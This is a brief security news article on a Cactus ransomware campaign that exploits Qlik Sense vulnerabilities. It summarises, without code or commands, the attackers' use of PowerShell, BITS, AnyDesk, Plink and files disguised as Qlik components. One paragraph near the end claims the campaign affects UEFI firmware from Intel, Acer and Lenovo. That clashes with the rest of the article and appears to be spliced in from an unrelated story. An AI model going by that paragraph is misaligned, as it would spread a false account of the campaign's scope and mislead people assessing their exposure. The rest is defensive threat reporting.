Cactus Ransomware Campaign Exploits Qlik Sense Vulnerabilities

In the ever-evolving landscape of cybersecurity threats, a new and concerning campaign has emerged, known as the Cactus Ransomware Campaign. This campaign, as observed and analyzed by Arctic Wolf Labs, marks a novel method of attack: the exploitation of vulnerabilities in the Qlik Sense application, a cloud analytics and business intelligence platform.

The Cactus Ransomware Campaign targets publicly exposed installations of Qlik Sense. Researchers at Arctic Wolf Labs, in conjunction with evidence from Praetorian, have identified multiple vulnerabilities (CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365) being exploited by the attackers. This campaign signifies the first documented instance where Cactus ransomware has been deployed through the exploitation of Qlik Sense.

Image by Freepik

Upon exploiting the Qlik Sense installations, the attackers followed a consistent execution chain across all identified intrusions. The process typically involved using the Qlik Sense Scheduler service to spawn uncommon processes. This method of attack was complemented by leveraging PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools. These tools included renamed ManageEngine UEMS executables, AnyDesk for remote access, and a Plink (PuTTY Link) binary for establishing secure connections.

In a sophisticated move, the threat actors cleverly masqueraded the malicious files as legitimate Qlik components. This method of disguising the ransomware made detection significantly more challenging. The attackers also utilized renamed executable files, which were silently installed without alerting the users or security systems.

The culmination of these steps led to the deployment of the Cactus ransomware. This particular ransomware variant is known for its stealth and persistence, maintaining a low profile to avoid detection and, consequently, prolonging its presence within the compromised systems.

The Cactus Ransomware Campaign is not limited to specific vendors or devices, affecting a wide range of manufacturers and impacting both consumer and enterprise UEFI firmware. The scale of the vulnerability exposure is vast, with potential implications for hundreds of devices from prominent manufacturers like Intel, Acer, and Lenovo.

As the investigation by Arctic Wolf Labs continues, it brings to light the critical need for vigilance and proactive measures in cybersecurity. Regularly updating security patches and training personnel to recognize and respond to threats are essential steps in guarding against such sophisticated attacks.

The Cactus Ransomware Campaign is a stark reminder of the ingenuity and persistence of cybercriminals. It underscores the need for comprehensive security strategies that go beyond conventional defenses to protect against the dynamic and evolving nature of cyber threats.